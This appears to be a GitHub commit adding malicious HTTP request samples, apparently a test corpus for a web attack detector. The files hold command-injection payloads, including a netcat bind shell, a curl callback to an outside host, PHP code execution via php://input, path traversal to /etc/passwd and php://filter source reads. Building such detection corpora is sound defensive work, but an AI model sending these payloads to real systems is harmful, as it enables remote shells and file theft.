-
Notifications
You must be signed in to change notification settings - Fork 86
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
xiaoputaoya
committed
May 29, 2023
1 parent
946c4cf
commit b479962
Showing
18 changed files
with
205 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,13 @@ | ||
| # tag: black,cmdi | ||
| POST / HTTP/1.1 | ||
| Host: 100.0.0.102:9999 | ||
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | ||
| Accept-Encoding: gzip, deflate, br | ||
| Accept-Language: zh-CN,zh;q=0.9 | ||
| Cache-Control: max-age=0 | ||
| Upgrade-Insecure-Requests: 1 | ||
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 | ||
| Content-Length: 164 | ||
| Content-Type: application/x-www-form-urlencoded | ||
|
|
||
| f2ek3=mkfifo+%2Ftmp%2Fvhmu%3B+%28nc%09-l%09-p+22940+%7C%7Cnc%09-l+22940%290%3C%2Ftmp%2Fvhmu%09%7C%09%2Fbin%2Fsh+%3E%2Ftmp%2Fvhmu%092%3E%261%3B+rm%09%2Ftmp%2Fvhmu%09 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,17 @@ | ||
| # tag: black,cmdi | ||
| POST / HTTP/1.1 | ||
| Host: 100.0.0.102:9999 | ||
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | ||
| Accept-Encoding: gzip, deflate, br | ||
| Accept-Language: zh-CN,zh;q=0.9 | ||
| Cache-Control: max-age=0 | ||
| Upgrade-Insecure-Requests: 1 | ||
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 | ||
| Content-Length: 224 | ||
| Content-Type: multipart/form-data; boundary=65cb89ac1b1033a8a024c48f4e77f6ff | ||
|
|
||
| --65cb89ac1b1033a8a024c48f4e77f6ff | ||
| Content-Disposition: form-data; name="lkkrj" | ||
|
|
||
| mkfifo /tmp/vhmu; (nc -l -p 22940 ||nc -l 22940)0</tmp/vhmu | /bin/sh >/tmp/vhmu 2>&1; rm /tmp/vhmu | ||
| --65cb89ac1b1033a8a024c48f4e77f6ff-- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,10 @@ | ||
| # tag: black,cmdi | ||
| POST /?pc7y0=1'%0acurl tst2.qq.com/cmd_inject/823236292a2e2d09f9b971fc57512c7d%0a' HTTP/1.1 | ||
| Host: 100.0.0.103:9999 | ||
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | ||
| Accept-Encoding: gzip, deflate, br | ||
| Accept-Language: zh-CN,zh;q=0.9 | ||
| Cache-Control: max-age=0 | ||
| Upgrade-Insecure-Requests: 1 | ||
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 | ||
| Content-Length: 0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,18 @@ | ||
| # tag: black,cmdi | ||
| # Request | ||
| GET / HTTP/1.1 | ||
| Host: 100.0.0.103:9999 | ||
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | ||
| Accept-Encoding: gzip, deflate, br | ||
| Accept-Language: zh-CN,zh;q=0.9 | ||
| Cache-Control: max-age=0 | ||
| Upgrade-Insecure-Requests: 1 | ||
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 | ||
| Content-Length: 193 | ||
| Content-Type: multipart/form-data; boundary=c73b32601324b2a8e4eebd01a1d5b695 | ||
|
|
||
| --c73b32601324b2a8e4eebd01a1d5b695 | ||
| Content-Disposition: form-data; name="bex49" | ||
|
|
||
| 1'%0acurl tst2.qq.com/cmd_inject/823236292a2e2d09f9b971fc57512c7d%0a' | ||
| --c73b32601324b2a8e4eebd01a1d5b695-- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,12 @@ | ||
| # tag: black,cmdi | ||
| POST / HTTP/1.1 | ||
| Host: 100.0.0.103:9999 | ||
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | ||
| Accept-Encoding: gzip, deflate, br | ||
| Accept-Language: zh-CN,zh;q=0.9 | ||
| Cache-Control: max-age=0 | ||
| Upgrade-Insecure-Requests: 1 | ||
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 | ||
| Content-Length: 75 | ||
|
|
||
| x06xp=1'%0acurl tst2.qq.com/cmd_inject/823236292a2e2d09f9b971fc57512c7d%0a' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,13 @@ | ||
| # tag: black,cmdi | ||
| POST / HTTP/1.1 | ||
| Host: 100.0.0.102:9999 | ||
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | ||
| Accept-Encoding: gzip, deflate, br | ||
| Accept-Language: zh-CN,zh;q=0.9 | ||
| Cache-Control: max-age=0 | ||
| Upgrade-Insecure-Requests: 1 | ||
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 | ||
| Content-Length: 41 | ||
| Content-Type: application/x-www-form-urlencoded | ||
|
|
||
| 8nwa1=%2Fbin%2Fsh+-c+%27which+which%27%09 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,9 @@ | ||
| # tag: black,cmdi | ||
| GET /?8nwa1=%2Fbin%2Fsh+-c+%27which+which%27%09 HTTP/1.1 | ||
| Host: 100.0.0.102:9999 | ||
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | ||
| Accept-Encoding: gzip, deflate, br | ||
| Accept-Language: zh-CN,zh;q=0.9 | ||
| Cache-Control: max-age=0 | ||
| Upgrade-Insecure-Requests: 1 | ||
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,17 @@ | ||
| # tag: black,cmdi | ||
| POST / HTTP/1.1 | ||
| Host: 100.0.0.102:9999 | ||
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | ||
| Accept-Encoding: gzip, deflate, br | ||
| Accept-Language: zh-CN,zh;q=0.9 | ||
| Cache-Control: max-age=0 | ||
| Upgrade-Insecure-Requests: 1 | ||
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 | ||
| Content-Length: 149 | ||
| Content-Type: multipart/form-data; boundary=b9a8c5dcccdb0fb85e4b7d6befe09f42 | ||
|
|
||
| --b9a8c5dcccdb0fb85e4b7d6befe09f42 | ||
| Content-Disposition: form-data; name="kgzv2" | ||
|
|
||
| /bin/sh -c 'which which' | ||
| --b9a8c5dcccdb0fb85e4b7d6befe09f42-- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,10 @@ | ||
| # tag: black,cmdi | ||
| GET /?qj8yq=mkfifo+%2Ftmp%2Fvhmu%3B+%28nc%09-l%09-p+22940+%7C%7Cnc%09-l+22940%290%3C%2Ftmp%2Fvhmu%09%7C%09%2Fbin%2Fsh+%3E%2Ftmp%2Fvhmu%092%3E%261%3B+rm%09%2Ftmp%2Fvhmu%09 HTTP/1.1 | ||
| Host: 100.0.0.102:9999 | ||
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | ||
| Accept-Encoding: gzip, deflate, br | ||
| Accept-Language: zh-CN,zh;q=0.9 | ||
| Cache-Control: max-age=0 | ||
| Upgrade-Insecure-Requests: 1 | ||
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 | ||
| Content-Length: 0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,10 @@ | ||
| # tag: black,file_include | ||
| POST /index.php?page=php://input%00 HTTP/1.0 | ||
| Host: 100.0.0.210:9999 | ||
| Connection: close | ||
| Content-Length: 31 | ||
| User-Agent: curl/7.86.0 | ||
| Accept: */* | ||
| Content-Type: application/x-www-form-urlencoded | ||
|
|
||
| <?php echo shell_exec('id'); ?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,12 @@ | ||
| # tag: black,file_include | ||
| GET /?page=....//....//etc/passwd HTTP/1.1 | ||
| Host: 100.0.0.102:9999 | ||
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | ||
| Accept-Encoding: gzip, deflate, br | ||
| Accept-Language: zh-CN,zh;q=0.9 | ||
| Cache-Control: max-age=0 | ||
| Upgrade-Insecure-Requests: 1 | ||
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 | ||
| Content-Length: 0 | ||
| Content-Type: application/x-www-form-urlencoded | ||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,12 @@ | ||
| # tag: black,file_include | ||
| GET /?page=..///////..////..//////etc/passwd HTTP/1.1 | ||
| Host: 100.0.0.102:9999 | ||
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | ||
| Accept-Encoding: gzip, deflate, br | ||
| Accept-Language: zh-CN,zh;q=0.9 | ||
| Cache-Control: max-age=0 | ||
| Upgrade-Insecure-Requests: 1 | ||
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 | ||
| Content-Length: 0 | ||
| Content-Type: application/x-www-form-urlencoded | ||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,13 @@ | ||
| # tag: black,file_include | ||
| POST / HTTP/1.1 | ||
| Host: 100.0.0.102:9999 | ||
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | ||
| Accept-Encoding: gzip, deflate, br | ||
| Accept-Language: zh-CN,zh;q=0.9 | ||
| Cache-Control: max-age=0 | ||
| Upgrade-Insecure-Requests: 1 | ||
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 | ||
| Content-Length: 38 | ||
| Content-Type: application/x-www-form-urlencoded | ||
|
|
||
| page=..///////..////..//////etc/passwd |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,9 @@ | ||
| # tag: black,file_include | ||
| GET /?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd HTTP/1.1 | ||
| Host: 100.0.0.102:9999 | ||
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | ||
| Accept-Encoding: gzip, deflate, br | ||
| Accept-Language: zh-CN,zh;q=0.9 | ||
| Cache-Control: max-age=0 | ||
| Upgrade-Insecure-Requests: 1 | ||
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,10 @@ | ||
| # tag: black,file_include | ||
| GET /?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php HTTP/1.1 | ||
| Host: 100.0.0.102:9999 | ||
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | ||
| Accept-Encoding: gzip, deflate, br | ||
| Accept-Language: zh-CN,zh;q=0.9 | ||
| Cache-Control: max-age=0 | ||
| Upgrade-Insecure-Requests: 1 | ||
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 | ||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,10 @@ | ||
| # tag: black,file_include | ||
| GET /?page=php://filter/read=string.rot13/resource=index.php HTTP/1.1 | ||
| Host: 100.0.0.102:9999 | ||
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | ||
| Accept-Encoding: gzip, deflate, br | ||
| Accept-Language: zh-CN,zh;q=0.9 | ||
| Cache-Control: max-age=0 | ||
| Upgrade-Insecure-Requests: 1 | ||
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 | ||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,10 @@ | ||
| # tag: black,file_include | ||
| GET /?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1 | ||
| Host: 100.0.0.102:9999 | ||
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | ||
| Accept-Encoding: gzip, deflate, br | ||
| Accept-Language: zh-CN,zh;q=0.9 | ||
| Cache-Control: max-age=0 | ||
| Upgrade-Insecure-Requests: 1 | ||
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 | ||
|
|